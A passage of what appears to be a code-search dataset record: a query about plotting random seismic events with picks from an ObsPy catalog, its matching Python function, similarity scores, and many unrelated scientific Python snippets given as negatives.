list(chemAtomSet0.chemAtomSets)\n if chemAtomSet in chemAtomSet0.chemAtomSets:\n chemAtomSets.remove(chemAtomSet)\n chemAtom0 = chemAtomSets[0].findFirstChemAtom()\n break\n \n elif chemAtomSet.isProchiral:\n for chemAtom1 in chemAtomSet.chemAtoms:\n if chemAtom1 is not chemAtom:\n chemAtom0 = chemAtom1\n break\n\n if chemAtom0:\n atom0 = atom.residue.findFirstAtom(name=chemAtom0.name)\n if atom0 and atom0.atomSet:\n \n resonances0 = list(resonance.resonanceSet.resonances)\n resonances1 = []\n \n for resonanceSet in atom0.atomSet.resonanceSets:\n if len(resonanceSet.atomSets) == 1:\n resonances1 = list(resonanceSet.resonances)\n break\n \n resonance.resonanceSet.delete()\n if resonances1:\n resonances1[0].resonanceSet.delete()\n \n if makeAmbiguous:\n for resonance1 in resonances1:\n assignAtomsToRes([atomSet,atom0.atomSet],resonance1)\n\n for resonance0 in resonances0:\n assignAtomsToRes([atomSet,atom0.atomSet],resonance0)\n\n else:\n \n for resonance1 in resonances1:\n assignAtomsToRes([atomSet, ],resonance1)\n\n for resonance0 in resonances0:\n assignAtomsToRes([atom0.atomSet, ],resonance0)\n \n if chemAtomSet.isEquivalent:\n for resonance0 in resonances0:\n resonancesX = getBoundResonances(resonance0, recalculate=True)\n \n for bound in resonancesX:\n if bound.resonanceSet:\n atomB = bound.resonanceSet.findFirstAtomSet().findFirstAtom()\n \n if areAtomsBound(atom, atomB):\n swapProchiralResonance(bound, makeAmbiguous)\n \n break\n \n else:\n for resonance1 in resonances1:\n resonancesX = getBoundResonances(resonance0, recalculate=True)\n \n for bound in resonancesX:\n if bound.resonanceSet:\n atomB = bound.resonanceSet.findFirstAtomSet().findFirstAtom()\n \n if areAtomsBound(atom0, atomB):\n swapProchiralResonance(bound, makeAmbiguous)\n \n break", "def DefinePRCatConstraint( self, placement, officeData, persoData ) :\n suffix = self.GetColumnsOption(persoData) if self.multi else ['']\n\n #returns which property has the office\n officeFilter = pd.pivot_table(officeData.loc[:,[self.label]], columns=self.label, index=officeData.index, aggfunc=len).fillna(0)\n\n #return the weight that a person attribute to being allocaetd category i\n # persoFilter = pd.pivot_table(persoData, values=self.weightLabel, columns=self.label, index=persoData.index, aggfunc='sum').fillna(0)\n persoFilter = pd.DataFrame()\n for x in suffix :\n table = pd.pivot_table(persoData, values=self.weightLabel+str(x), columns=self.label+str(x), index=persoData.index, aggfunc='sum').fillna(0)\n persoFilter = persoFilter.add(table, fill_value=0)\n\n commonLabels = list(set(persoFilter.columns).intersection(officeFilter.columns))\n officeFilter = officeFilter.loc[:,commonLabels].values\n self.wish = persoFilter.loc[:,commonLabels].values\n\n #return the properties which have been allocated to each perso\n self.dispo = np.dot( placement, officeFilter )", "def _fix_array_item_vals(self):\n for m in self.masks():\n if self._has_categorical_data(m):\n lib_vals = 'lib@values@{}'.format(m)\n self._meta['masks'][m]['values'] = lib_vals\n for s in self.sources(m):\n self._meta['columns'][s]['values'] = lib_vals\n return None", "def pick(self):\n self._val = False", "def clean(self):\n self.unique_combinations = {}\n self.reverse_combinations = []\n self.label_count = None", "def removeAllCorrelations(self, removeReImCorrel = True):\n\t\tdim = len(self.coma)/2\n#\t#\tCMwrite(\"removeAllCorrelations\")\n\t\tfor i in range(dim):\n\t\t\tfor j in range(dim):\n\t\t\t\tif not i == j:\n\t\t\t\t\tself.coma[2*i ,2*j ] = 0.\t\t\n\t\t\t\t\tself.coma[2*i+1,2*j ] = 0.\n\t\t\t\t\tself.coma[2*i ,2*j+1] = 0.\n\t\t\t\t\tself.coma[2*i+1,2*j+1] = 0.\n\t\t\t\telif removeReImCorrel:\n\t\t\t\t\tself.coma[2*i+1,2*j ] = 0.\n\t\t\t\t\tself.coma[2*i ,2*j+1] = 0.\n\t\tself.makeComaInv()\n\t\tself.specialCOMAs = {}", "def _update_correlation(self, clean_samples, prev_dependent_properties):\n batch_properties = self._get_correlation_dependent_properties(clean_samples)\n batch_corr = self._get_correlation(clean_samples, batch_properties)\n\n self.correlation_matrix = self._merge_correlation_helper(\n self.correlation_matrix, prev_dependent_properties[\"mean\"],\n prev_dependent_properties[\"std\"], self.total_samples - self.row_is_null_count,\n batch_corr, batch_properties[\"mean\"],\n batch_properties[\"std\"], batch_properties['count'])", "def _reset_derived_prop_(self):\n self._derived_properties[\"photosamplers\"] = None", "def redundantECsForContributingNeofunctionalisation(self, \n majorityPercentageCoreMetabolism = defaultMajorityPercentageCoreMetabolism, \n majorityPercentageNeofunctionalisation = defaultMajorityPercentageNeofunctionalisation, \n eValue = defaultEValue, \n redundancyType: 'RedundancyType' = None,\n considerOnlyECs = None) -> Dict[Neofunctionalisation, Set[EcNumber]]:\n from FEV_KEGG.Robustness.Topology.Redundancy import Redundancy, RedundancyContribution, RedundancyType\n \n if redundancyType is None:\n redundancyType = RedundancyType.default\n \n #- calculate \"neofunctionalised\" ECs\n neofunctionalisedMetabolismSet = self.neofunctionalisedECs(majorityPercentageCoreMetabolism, majorityPercentageNeofunctionalisation, eValue, considerOnlyECs).getECs()\n neofunctionalisationsForFunctionChange = self.neofunctionalisationsForFunctionChange(majorityPercentageCoreMetabolism, majorityPercentageNeofunctionalisation, eValue, considerOnlyECs)\n \n #- calculate redundancy\n redundancy = Redundancy( self.coreMetabolism(majorityPercentageCoreMetabolism) )\n redundancyContribution = RedundancyContribution(redundancy, neofunctionalisedMetabolismSet)\n \n contributedECsForContributingNeofunctionalisedEC = redundancyContribution.getContributedKeysForSpecial(redundancyType)\n contributingNeofunctionalisedECs = set(contributedECsForContributingNeofunctionalisedEC.keys())\n \n #- REPEAT for each function change consisting of \"neofunctionalised\" ECs, which also contribute to redundancy\n contributingNeofunctionalisations = dict()\n \n for functionChange, neofunctionalisations in neofunctionalisationsForFunctionChange.items():\n #- report enzyme pairs of neofunctionalisations, which caused the EC to be considered \"neofunctionalised\", and are in return contributing to redundancy \n \n if functionChange.ecA in contributingNeofunctionalisedECs or functionChange.ecB in contributingNeofunctionalisedECs: # function change contributes to redundancy\n \n for neofunctionalisation in neofunctionalisations:\n currentSetOfContributedECs = contributingNeofunctionalisations.get(neofunctionalisation, None)\n \n if currentSetOfContributedECs is None:\n currentSetOfContributedECs = set()\n contributingNeofunctionalisations[neofunctionalisation] = currentSetOfContributedECs\n \n for ec in functionChange.ecPair:\n contributedECs = contributedECsForContributingNeofunctionalisedEC.get(ec, None)\n if contributedECs is not None:\n currentSetOfContributedECs.update(contributedECs)\n \n return contributingNeofunctionalisations", "def __reset_crosshair(self):\n self.lhor.set_ydata(self.y_coord)\n self.lver.set_xdata(self.x_coord)", "def test_uc_to_assignment(self):\r\n expected = {'q1': (['A', 'B', 'C'], 1.0, 2),\r\n 'q2': (['A', 'H', 'I', 'J'], 2. / 3., 3),\r\n 'q3': (['Unassigned'], 1.0, 1),\r\n 'q4': (['Unassigned'], 1.0, 1),\r\n 'q5': (['Unassigned'], 1.0, 1)\r\n }\r\n params = {'id_to_taxonomy_fp': self.id_to_tax1_fp,\r\n 'reference_sequences_fp': self.refseqs1_fp}\r\n t = UclustConsensusTaxonAssigner(params)\r\n actual = t._uc_to_assignment(self.uc1_lines)\r\n self.assertEqual(actual, expected)\r\n\r\n # change label for unassignable\r\n expected = {'q1': (['A', 'B', 'C'], 1.0, 2),\r\n 'q2': (['A', 'H', 'I', 'J'], 2. / 3., 3),\r\n 'q3': (['x'], 1.0, 1),\r\n 'q4': (['x'], 1.0, 1),\r\n 'q5': (['x'], 1.0, 1)\r\n }\r\n params = {'id_to_taxonomy_fp': self.id_to_tax1_fp,\r\n 'reference_sequences_fp': self.refseqs1_fp,\r\n 'unassignable_label': 'x'}\r\n t = UclustConsensusTaxonAssigner(params)\r\n actual = t._uc_to_assignment(self.uc1_lines)\r\n self.assertEqual(actual, expected)", "def _c_correlation(cls, X, y):\n su = np.zeros(X.shape[1])\n for i in np.arange(X.shape[1]):\n su[i] = cls._symmetrical_uncertainty(X[:, i], y)\n return su", "def update_naked_set(ns, cpns):\n for k, v in cpns.items():\n if len(v) == 1:\n del ns[v.pop()]\n else:\n if len(set(v)) < 3:\n for coord in set(v):\n del ns[coord]\n return ns", "def SwapSides(self):\n for c in self.reactants:\n c.coeff = -c.coeff", "def visualize_correspondence(opt, source_shape, source_face, target_shape, target_face, corres_1, corres_2):\n # save these points with color codes\n P = corres_2.shape[0]\n assert(corres_1.shape[0] == corres_2.shape[0])\n corres_1 = corres_1.cpu().numpy().reshape(-1)\n corres_2 = corres_2.cpu().numpy().reshape(-1)\n normalize = Normalize(vmin=0, vmax=corres_1.shape[0])\n cmap = cm.get_cmap(\"jet\")\n colors_picked = cmap(normalize(np.arange(P, dtype=np.float32)))[:, :3]\n colors_source = np.ones((source_face.shape[1], 3), dtype=np.float32)\n colors_source[corres_1, :] = colors_picked\n save_ply_with_face(source_shape[0].cpu().detach().numpy(), source_face[0].cpu().detach().numpy(),\n os.path.join(opt.log_dir, opt.subdir, \"source_corr.ply\"), colors_source)\n colors_target = np.ones((target_face.shape[1], 3), dtype=np.float32)\n colors_target[corres_2, :] = colors_picked\n save_ply_with_face(target_shape[0].cpu().detach().numpy(), target_face[0].cpu().detach().numpy(),\n os.path.join(opt.log_dir, opt.subdir, \"target_corr.ply\"), colors_target)" ]
[ "0.55101144", "0.54023015", "0.5400192", "0.5268006", "0.5240452", "0.5010482", "0.4968746", "0.48149148", "0.4811697", "0.47968152", "0.47857383", "0.47856605", "0.47505182", "0.47229475", "0.46873763", "0.46638468", "0.46599233", "0.46597108", "0.46573195", "0.4628536", "0.46191543", "0.46072078", "0.4606475", "0.46052068", "0.45919237", "0.45742354", "0.45686254", "0.45517054", "0.45242178", "0.4513519", "0.4499908", "0.44961277", "0.44954637", "0.44935793", "0.44924453", "0.44863918", "0.44839963", "0.44789845", "0.44778317", "0.44729632", "0.44630957", "0.44590563", "0.44568962", "0.44467616", "0.4441275", "0.44391435", "0.442838", "0.4427632", "0.4421113", "0.44191873", "0.44038394", "0.4403729", "0.43915924", "0.4389732", "0.43802077", "0.43766102", "0.4374492", "0.43621525", "0.43497", "0.43461654", "0.43445364", "0.43413162", "0.43392822", "0.43392232", "0.4334612", "0.4334567", "0.43338436", "0.43322414", "0.43221492", "0.4320541", "0.43087465", "0.43058947", "0.43022114", "0.42959103", "0.4293332", "0.42931727", "0.42899612", "0.4284285", "0.42818248", "0.4272806", "0.42702317", "0.42678192", "0.42649105", "0.42566013", "0.42520466", "0.42518732", "0.4251432", "0.42449823", "0.42417753", "0.42416587", "0.42352676", "0.42273208", "0.42234692", "0.4223213", "0.42224613", "0.42206612", "0.4219931", "0.4216707", "0.4208439", "0.42071503" ]
0.49707213
6
Function to plot a random sample from a catalog with picks
def simple_pick_plot(cat, n_events, template_dict, st_dict, pyasdf=None, savefiles=False): from obspy import Catalog, UTCDateTime, Stream from obspy.core.event import ResourceIdentifier if n_events == 'all': rand_cat = cat else: rand_cat = rand_cat_sample(cat, n_events) # Make a list of year + julday integers to loop over min_date = min([ev.preferred_origin().time for ev in rand_cat]) max_date = max([ev.preferred_origin().time for ev in rand_cat]) for date in daterange(min_date, max_date): day_cat = rand_cat.filter("time >= " + str(UTCDateTime(date)), "time <= " + str(UTCDateTime(date) + 86400)) if len(day_cat) == 0: continue stachans = {pk.waveform_id.station_code: [] for ev in day_cat for pk in ev.picks} for ev in day_cat: for pick in ev.picks: if pick.waveform_id.channel_code not in stachans[pick.waveform_id.station_code]: stachans[pick.waveform_id.station_code].append(pick.waveform_id.channel_code) print(stachans) # Read the waveforms for this day if pyasdf: st = Stream() with pyasdf.ASDFDataSet(pyasdf) as ds: for sta in stachans: for station in ds.ifilter(ds.q.station == str(sta), ds.q.channel == stachans[sta], ds.q.starttime >= UTCDateTime(date), ds.q.endtime <= UTCDateTime(date) + 86400): st += station.raw_recording for ev in day_cat: det_st = st_dict[ev.resource_id] det_temp = template_dict[ResourceIdentifier('smi:local/' + str(ev.resource_id).split('/')[-1].split('_')[0] + '_1sec')] fig = plot_repicked(det_temp, ev.picks, det_st, size=(21, 15), save=savefiles, savefile=str(ev.resource_id).split('/')[-1] + '.png', title=str(ev.resource_id).split('/')[-1])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def plot_random_sample(pattern, num_to_select, row_no, col_no, c_map=\"viridis\"):\n mpl.rc(\"image\", cmap=c_map)\n all_images = get_image_paths(pattern)\n sampled_img = get_rand_img(num_to_select, all_images)\n plot_grid(row_no, col_no, sampled_img)", "def sample_and_plot(self):\n fig = plt.figure()\n ax = plt.axes(projection = '3d')\n ax.plot_surface(self.X, self.Y, self.sample(), cmap = plt.cm.jet, rstride = 2, cstride = 2, linewidth = 1)\n plt.show()", "def add_sample(self, stddev, corrcoef, *args, **kwargs):\n sc = self.ax.scatter(NP.arccos(corrcoef), stddev,\n *args, **kwargs) # (theta,radius)\n self.samplePoints.append(sc)\n return sc\n\n #l, = self.ax.plot(NP.arccos(corrcoef), stddev,\n # *args, **kwargs) # (theta,radius)\n #self.samplePoints.append(l)#\n #return l", "def add_sample(self, stddev, corrcoef, *args, **kwargs):\n sc = self.ax.scatter(NP.arccos(corrcoef), stddev,\n *args, **kwargs) # (theta,radius)\n self.samplePoints.append(sc)\n return sc\n\n #l, = self.ax.plot(NP.arccos(corrcoef), stddev,\n # *args, **kwargs) # (theta,radius)\n #self.samplePoints.append(l)#\n #return l", "def add_sample(self, stddev, corrcoef, *args, **kwargs):\n\n l, = self.ax.plot(NP.arccos(corrcoef), stddev,\n *args, **kwargs) # (theta,radius)\n self.samplePoints.append(l)\n\n return l", "def add_sample(self, stddev, corrcoef, *args, **kwargs):\n\n l, = self.ax.plot(np.arccos(corrcoef), stddev,\n *args, **kwargs) # (theta,radius)\n self.samplePoints.append(l)\n\n return l", "def draw(self, nsamples):\n \n if self.dist == 'normal':\n mean = self.mean\n sd = self.sd\n self.sample = sd * np.random.randn(nsamples) + mean\n \n elif self.dist == 'poisson':\n lam = self.lam\n self.sample = np.random.poisson(lam, size=nsamples)\n \n elif self.dist == 'binomial':\n n = self.n\n p = self.p\n self.sample = np.random.binomial(n, p, size=nsamples)\n \n else:\n print('dist must be normal, poisson or binomial')", "def selectFigures(self):\n # Shuffle the dictionary\n dict_items = list(self.pathCrr.items())\n random.shuffle(dict_items)\n self.pathCrr = {}\n self.pathCrr = {key:value for (key,value) in dict_items}\n\n self.nextBarFigure()\n self.nextLineFigure()", "def plot_sample(x, y, axis):\n img = x.reshape(96, 96)\n axis.imshow(img, cmap='gray')\n axis.scatter(y[0::2] * 48 + 48, y[1::2] * 48 + 48, marker='x', s=10)", "def plot_sample(self):\n print(u'plot_sample()')\n data_set = self.data_sets[1]\n scenario = u'Greedy Search'\n titles = [u'Collaborative Filtering', u'Content-based']\n fig, axes = plt.subplots(1, 2, figsize=(10, 5))\n for i, rec_type in enumerate(data_set.missions):\n graph = data_set.folder_graphs + rec_type + '_' + str(15) + u'.txt'\n for strategy in Strategy.strategies:\n m = data_set.missions[rec_type][graph][strategy][scenario]\n m.compute_stats()\n ppl.plot(axes[i], np.arange(STEPS_MAX + 1),\n m.stats, label=strategy, linewidth=2)\n axes[i].set_xlabel(u'#Hops')\n axes[i].set_ylabel(u'Success Ratio')\n axes[i].set_ylim(0, 85)\n axes[i].set_xlim(0, STEPS_MAX * 1.01)\n axes[i].set_title(titles[i])\n ppl.legend(axes[i], loc=0)\n\n\n # plt.suptitle(u'Greedy Search on the BookCrossing for N=15',\n # size='xx-large', x=0.5)\n fig.subplots_adjust(left=0.08, right=0.97, top=0.9)\n\n plt.savefig('plots/sample.png')\n plt.savefig('plots/sample.pdf')", "def sample_plot(self, sample_pre, sample_post, circle_size=10.0):\n colored_samples = [[] for i in range(5)]\n for inputs, label in zip(sample_pre, sample_post):\n x, y = self.attacker_position(inputs)\n colored_samples[label].append((x, y))\n for label, points in enumerate(colored_samples):\n plt.scatter([x for x, y in points], [y for x, y in points],\n color=self.color(int(label)), s=circle_size)", "def plot_rand(txyxidata, b,X, outfile):\r\n\t\r\n\tme = \"LE_Plot.plot_rand: \"\r\n\tif os.path.isfile(outfile): return me+\"skip\"\r\n\tt0 = time.time()\r\n\tshowplot = False\r\n\t\r\n\tt, x, eta, xi = txyxidata\r\n\tdel txyxidata\r\n\ttmax = np.ceil(t.max())\r\n\t\r\n\t## Plot walk\r\n\tfs = 25\r\n\twinsize = int(tmax/80)\r\n\tfig, (ax1, ax2, ax3) = plt.subplots(nrows=3, sharex=True)\r\n\tfig.suptitle(outfile)#+\"\\n\"+str(argv)[1:-1])\r\n\tenvelope_plot(t, xi, winsize, ax=ax1)\r\n\tax1.set_ylabel(\"$\\\\xi$\",fontsize=fs)\r\n\tenvelope_plot(t, eta, winsize, ax=ax2)\r\n\tax2.set_ylabel(\"$\\eta$\",fontsize=fs)\r\n\tenvelope_plot(t, x, winsize, ax=ax3)\r\n\tax3.plot([0,t.max()],[X,X],\"k--\"); ax3.plot([0,t.max()],[-X,-X],\"k--\")\r\n\tax3.set_xlabel(\"$t$\",fontsize=fs);ax3.set_ylabel(\"$x$\",fontsize=fs)\r\n\tetalim = np.ceil(abs(eta).max())\t## Not perfect\r\n\t#fig.tight_layout()\r\n\tplt.savefig(outfile)\r\n\tprint me+\"Plot saved as\",outfile\r\n\tprint me+\"Plotting random data:\",round(time.time()-t0,1),\"seconds\"\r\n\tif showplot:\t\tplt.show()\t\r\n\t\r\n\tplt.close(fig)\t\r\n\treturn", "def plot_some_spikes(ax, waveforms, n_max=20, **kwargs):\n from numpy import random\n N = waveforms.shape[0]\n sample = random.choice(N, min(N, n_max), replace=False)\n ax.cla()\n ax.plot(waveforms[sample].T, **kwargs)", "def plot_sample(x):\n plt.imshow(x[:,:,0])\n plt.title(\"gasf\")\n plt.colorbar()\n plt.show()\n\n plt.imshow(x[:,:,1])\n plt.title(\"gadf\")\n plt.colorbar()\n plt.show()\n\n plt.imshow(x[:,:,2])\n plt.title(\"mtf\")\n plt.colorbar()\n plt.show()", "def randomShow(x,n,picsize):\n col = 10\n row = int(np.ceil(n/10.0))\n fig,ax = plt.subplots(row,col)\n #rnd = np.random.randint(0,np.size(x,0),n)\n rnd = np.arange(0,n)\n xl = x[rnd].reshape((n,picsize[0],picsize[1]))\n for i in range(0,row):\n for j in range(0,col):\n # if not transpose xl[i*col+j], the picture will show horizontally\n ax[i,j].imshow(xl[i*col+j].T,cmap=plt.cm.gray)\n ax[i,j].set_xticks([])\n ax[i,j].set_yticks([])\n plt.axis('off')", "def draw_random_sample(grids, steps=None, connection=None):\n sample = random.randint(0, grids.shape[0] - 1)\n draw_grid(grids[sample])\n print (\"sample no. %d\" % sample)\n if steps is not None:\n print (\"steps: %d\" % steps[sample])\n if connection is not None:\n print (\"connection: %d\" % connection[sample])", "def draw_bs_sample(data):\n return rg.choice(data, size=len(data))", "def drawSample(self, index, color):\n t = Trajectory.createFromTuples(self.graphs[index])\n l = t.sampleSegments(self.sample_number, include=self.include)\n for e in l:\n p = Point(*e, radius=5, conversion=False)\n p.show(self.context)", "def plot_samples(s):\r\n assert len(s[0, :]) >= 2, ('The Phase space dimensions are less than two.', ' Need at least two to plot.')\r\n fig = plt.figure(1)\r\n if len(s[0, :]) >= 3:\r\n ax = fig.add_subplot(111, projection='3d')\r\n ax.scatter(s[:, 0], s[:, 1], s[:, 2])\r\n fig = plt.figure(2)\r\n plt.scatter(s[:, 0], s[:, 1])\r\n plt.show()", "def plot_random_generated_images(self):\n dimensions=(10, 10)\n figsize=(10, 10)\n n_samples=100\n \n (X, _), _ = self.generate_generator_prediction_samples(n_samples)\n \n self.grid_plot(X, dimensions=dimensions, figsize=figsize)", "def plot_sample_distribution(samples):\n plt.hist(samples, 50)\n plt.xlabel('Value of a sample')\n plt.ylabel('Number of samples')\n plt.title('Sample distribution')\n plt.show()", "def sample(self):\n return self.items[self.np_random.choice(len(self.items))]", "def test_random_multi_image():\n\n shap.image_plot([np.random.randn(3, 20, 20) for i in range(3)], np.random.randn(3, 20, 20), show=False)", "def draw_bs_sample(data):\n return np.random.choice(data, size=len(data))", "def _nd_plot_samples(self, **kwargs):\n\n from pesummary.core.plots.plot import _make_comparison_corner_plot as plotfunc\n\n plotkwargs = kwargs.copy()\n\n args = [self._samples]\n plotkwargs[\"corner_parameters\"] = self.parameters\n if \"latex_labels\" not in kwargs:\n plotkwargs[\"latex_labels\"] = self.latex_labels\n\n if \"plot_percentile\" not in kwargs:\n plotkwargs[\"plot_percentile\"] = False\n\n # get ranges for each parameter to set figure axes extents\n if \"range\" not in kwargs:\n range = []\n for param in self.parameters:\n range.append(\n [\n np.min(\n [samps[param].min() for samps in self._samples.values()]\n ),\n np.max(\n [samps[param].max() for samps in self._samples.values()]\n ),\n ]\n )\n plotkwargs[\"range\"] = range\n\n # default to not show quantile lines\n plotkwargs.setdefault(\"quantiles\", None)\n\n # set default injection line color\n plotkwargs.setdefault(\"truth_color\", \"k\")\n\n # set injection parameter values\n if self.injection_parameters is not None:\n injpars = [\n self.injection_parameters[p] - self.parameter_offsets[p]\n for p in self.parameters\n if self.injection_parameters[p] is not None\n ]\n if len(injpars) == self._num_parameters:\n plotkwargs[\"truths\"] = injpars\n\n # create plot\n with DisableLogger():\n fig = plotfunc(*args, **plotkwargs)\n\n # turn frame off on legend\n fig.legends[0].set_frame_on(False)\n\n return fig", "def lattice_sample_taken(self, ind, series):", "def test_plot_picks(self):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n pickdb = PickDatabaseConnection(':memory:')\n for pick in uniq_picks:\n pickdb.update_pick(**pick)\n splt = SEGYPickPlotter(ax, self.segy, pickdb)\n # should add a single artist to the line dict. for each event\n splt.plot_picks()\n for event in self.pickdb.events:\n self.assertTrue(len(splt.ACTIVE_LINES[event]), 1)\n # should be able to add new picks and have them be accessible by the\n # SEGYPickPlotter\n new_event = '--tracer--'\n new_pick = copy.copy(uniq_picks[0])\n new_pick['event'] = new_event\n pickdb.update_pick(**new_pick)\n splt.plot_picks()\n self.assertTrue(new_event in splt.ACTIVE_LINES)", "def sample(self, seg_logit, seg_label):", "def show_random_samples(batch, rows=5, cols=5, width=None, height=None, shuffle=True):\n if width is None: width = 1.5*cols\n if height is None: height = 1.5*rows\n\n if rows * cols == 1:\n axes = [plt.subplots(rows, cols, figsize=(width, height))[1]]\n else:\n axes = plt.subplots(rows, cols, figsize=(width, height))[1].flatten()\n\n # by default batch_size=1 in DataLoader\n for ax, x in zip(axes, DataLoader(TensorDataset(batch), shuffle=shuffle)):\n ax.imshow(x[0].reshape(batch.shape[-2:]), cmap=\"gray\")\n ax.axis('off')", "def choose_number_random_category(self):\n self.view.choose_number_random_category()", "def _choose_sample(self):\n\n \t #periodically generate a new reconstruction for the purposes of sampling", "def __call__(self, sample):\n image, landmarks = sample['image'], sample['landmarks']\n choices = ((0, 1, 2), (0, 2, 1), (1, 0, 2),\n (1, 2, 0), (2, 1, 0), (2, 0, 1))\n p = random.random()\n if p <= 0.5:\n idx = random.randint(0, 5)\n swap = choices[idx]\n image = image[:, :, swap]\n return {'image': image,\n 'landmarks': landmarks}", "def test_random_single_image():\n\n shap.image_plot(np.random.randn(3, 20, 20), np.random.randn(3, 20, 20), show=False)", "def plotSampleDistributions(\n samples,\n nXStart=0,\n nXStep=0,\n obsTitles=None,\n xRange=None\n):\n # Set up display\n font = \"Times\"\n sns.set(\n style=\"ticks\",\n font_scale=0.5,\n )\n matplotlib.rcParams['mathtext.fontset'] = 'cm'\n font = {\n 'family':'serif',\n 'serif': ['times new roman'],\n 'style': 'normal',\n 'variant': 'normal',\n 'weight': 'ultralight'\n }\n plt.rc('font', **font)\n\n # Number of columns and rows\n nObs = samples.shape[0]\n nX = samples.shape[1]\n # Access shifted range\n if xRange is None:\n xRange = np.arange(nXStart, nX, nXStep)\n nCols = len(xRange)\n samples = samples[:, nXStart::nXStep, :]\n\n if obsTitles is None:\n obsTitles = [r\"$\\mathcal{{O}}_{{{0}}}$\".format(no) for no in range(nObs)]\n\n # Create the figure grid\n fig, axs = plt.subplots(\n dpi=400,\n figsize=(0.8*nObs, 0.4*nCols),\n nrows=nCols,\n ncols=nObs,\n )\n\n # Loop through columns and rows\n for no, (axRow, corrData) in enumerate(zip(axs.T, samples)):\n for nx, (ax, corrDataNx) in enumerate(zip(axRow, corrData)):\n\n # Set titles, row labels and legend\n if nx == 0:\n ax.set_title(obsTitles[no], y=1.2)\n if no == 0:\n ax.set_ylabel(xRange[nx])\n if nx == 0 and no == 0:\n legends = [r\"$\\mu$\", \"Bins\", \"PDF\"]\n else:\n legends = [None, None, None]\n\n # Get mean and standard deviation of sample\n ## Plot an horizontal line at position\n mean, sdev = np.mean(corrDataNx), np.std(corrDataNx, ddof=1)\n ax.axvline(mean, color=\"black\", lw=0.5, ls=\"--\", label=legends[0])\n\n # Plot the histogram including KDE\n p = sns.distplot(\n corrDataNx,\n kde=True,\n norm_hist=True,\n ax=ax,\n kde_kws={\"alpha\":0.8, \"lw\":0.7},\n hist_kws={\"histtype\":\"stepfilled\"},\n label=legends[1]\n )\n\n # Plot the distribution estimate\n x = np.linspace(*p.get_xlim(), num=100)\n ax.plot(\n x,\n stats.norm.pdf(x, loc=mean, scale=sdev),\n ls=\"--\", lw=1.0,\n label=legends[2]\n )\n\n # set legend if fist entry\n if nx == 0 and no == 0:\n ax.legend(\n loc=\"center\",\n fontsize=\"xx-small\",\n bbox_to_anchor=[-0.1, 1.5, 0, 0],\n frameon=True\n )\n\n # Further styling\n ## Remove y-axis\n ax.set(yticks=[])\n ## Set up x-axis to only contain mu values on top\n ax.set_xticks([mean])\n ## Create mu text\n mustr = r\"$\\mu ={mu} $\".format(mu=gv.gvar(mean, sdev))\n if \"e-\" in mustr:\n mustr = re.sub(\"e-0*([1-9]+)\", r\"\\cdot 10^{-\\g<1>}\", mustr)\n ax.set_xticklabels([mustr], fontdict={\"size\":\"xx-small\"})\n ax.xaxis.tick_top()\n ax.tick_params(direction='out', length=0, width=0.5, pad=-0.5, top=True)\n\n ## Reduce line width of visible axis\n ax.spines[\"bottom\"].set_linewidth(0.5)\n ax.spines[\"top\"].set_linewidth(0.)\n\n # Remove other remaining axis\n sns.despine(fig, left=True, right=True, top=False)\n # And adjust intermediate distances\n fig.subplots_adjust(wspace=0.05, hspace=0.45)\n\n return fig", "def seed_plots(self, bcut=5, subset=None, title=None):\n z = self.seeds if subset is None else self.seeds[subset]\n fig,axx= plt.subplots(1,3, figsize=(12,4))\n plt.subplots_adjust(left=0.1)\n bc = np.abs(z.b)<bcut\n histkw=dict(histtype='step', lw=2)\n def all_plot(ax, q, dom, label):\n ax.hist(q.clip(dom[0],dom[-1]),dom, **histkw)\n ax.hist(q[bc].values.clip(dom[0],dom[-1]),dom, color='orange', label='|b|<%d'%bcut, **histkw)\n plt.setp(ax, xlabel=label, xlim=(None,dom[-1]))\n ax.grid()\n ax.legend(prop=dict(size=10))\n all_plot(axx[0], z['size'], np.linspace(0.5,10.5,11), 'cluster size')\n all_plot(axx[1], z.ts, np.linspace(0,50,26), 'TS')\n all_plot(axx[2], np.sin(np.radians(z.b)), np.linspace(-1,1,41), 'sin(b)')\n axx[2].axvline(0, color='k')\n fig.suptitle('{} {} seeds from model {}'.format( len(z), self.tsname, self.input_model,)\n if title is None else title)\n fig.set_facecolor('white')\n return fig", "def _draw_from_distr(self, values, pairs, randomize):\n # sample size one less than pairs specification as pairs contain\n # the total mass and component percentages. These are transformed\n # into component masses\n sample = [None for i in range(len(pairs)-1)]\n for i in range(len(pairs)):\n vs = pairs[i]\n mean = values[2*i]\n std = values[2*i+1]\n if std>0.0 and randomize:\n samplemean = random.gauss(mean, std)\n else:\n samplemean = mean\n if vs[0] == 'mass':\n samplemass = samplemean\n remainingmass = samplemean\n elif vs[0] != 'water':\n compmass = samplemass * samplemean\n sample[vs[1]] = compmass\n remainingmass -= compmass\n elif vs[0] == 'water':\n waterind = i\n sample[pairs[waterind][1]] = remainingmass\n return sample", "def random_sample_objs(num_per_cat):\n\n obj_path_lists = load_object_lists(g_render_objs)\n obj_path_list = []\n\n for pathes in obj_path_lists:\n pathes = list(pathes)\n random.shuffle(pathes)\n if num_per_cat > len(pathes):\n num_per_cat = len(pathes)\n samples = random.sample(pathes, num_per_cat)\n obj_path_list += samples\n\n return obj_path_list", "def plotfrom_catcorr(self, cat_corr, **pltkwargs):\n\n catdict = cat_corr['catalog']\n corrdict = cat_corr['correction']\n\n dlosclass = Dlos(cat_corr)\n dlos_file = dlosclass.file_name \n\n if 'binsize' in pltkwargs.keys(): \n binsize = pltkwargs['binsize']\n pltkwargs.pop('binsize', None) # remove from dictionary\n else: \n binsize = 0.5 # (default)\n\n xmid, dlos_hist = dlosclass.dlos_dist( binsize = binsize )\n \n if 'label' not in pltkwargs.keys(): \n if 'cmasslowz' in catdict['name']: \n catname = 'cmasslowz'\n else: \n catname = catdict['name']\n\n pltkwargs['label'] = ''.join([\n catname, ':', \n corrdict['name']\n ])\n elif pltkwargs['label'] == False: \n pass\n \n if 'rescale' in pltkwargs.keys(): \n dlos_hist = dlos_hist * pltkwargs['rescale']\n pltkwargs.pop('rescale', None)\n\n self.sub.plot(xmid, dlos_hist, **pltkwargs) \n \n self.hist_max = max([ dlos_hist.max(), self.hist_max ]) \n\n return None", "def drawCatplot(df, xColumn):\n plt.style.use('default')\n plt.style.use('dark_background')\n types = getSpectralTypes()\n colors = getColors()\n sns.set_palette(sns.color_palette(colors))\n \n sns.catplot(x=xColumn, y=\"spectral_type\", data=df, order=types, height=3, \n aspect=4);\n plt.show()", "def plotspec(ant,freq=True,test=False):\n snap.write_int('rst',1)\n snap.write_int('antenna',ant);\n 